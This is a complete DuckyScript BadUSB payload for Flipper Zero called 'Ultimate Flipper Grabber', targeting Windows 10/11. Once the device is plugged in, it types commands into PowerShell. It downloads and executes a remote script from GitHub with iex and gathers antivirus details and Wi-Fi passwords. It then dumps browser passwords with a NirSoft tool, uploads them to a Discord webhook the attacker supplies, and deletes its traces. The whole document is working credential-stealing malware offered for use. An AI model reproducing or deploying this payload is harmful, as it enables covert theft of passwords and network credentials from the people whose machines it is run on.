REM Title: Ultimate Flipper Grabber
REM Author: blobs0 (https://github.com/blobs0/Ultimate-Flipper-Grabber)
REM Credit Discord webhooks functions :I-am-jakoby
REM Credit Wifi grabber : 7h30th3r0n3 and the0bone
REM Credit Password Nirsoft : moosehadley
REM Target:  Windows 10/11 (7/8 not tested)
REM Supported Layout keyboard: US/FR/DE
REM Version: 1.1
REM Category: Grabber
REM Extrait l'antivirus, les mots de passe wifi et de navigateur vers un webhook discord.
DELAY 2000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
REM edit your webhook here
STRING $DiscordUrl = 'Your-Discord-Webhook'
ENTER
STRING iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/blobs0/Ultimate-Flipper-Grabber/main/payload.ps1'))
ENTER
DELAY 500
STRING version-av
ENTER
STRING Wifi
ENTER
STRING Get-Nirsoft
ENTER
DELAY 5000
STRING wbpv28821@
ENTER
STRING .\WebBrowserPassView.exe
ENTER
DELAY 3000
CTRL A
CTRL S
DELAY 1000
STRING c:\temp\export.txt
ENTER
DELAY 1000
ALT F4
DELAY 800
STRING Upload-Discord -file "C:\temp\export.txt" -text "Browser password :"
ENTER
STRING Del-Nirsoft-File
ENTER
STRING EXIT
ENTER
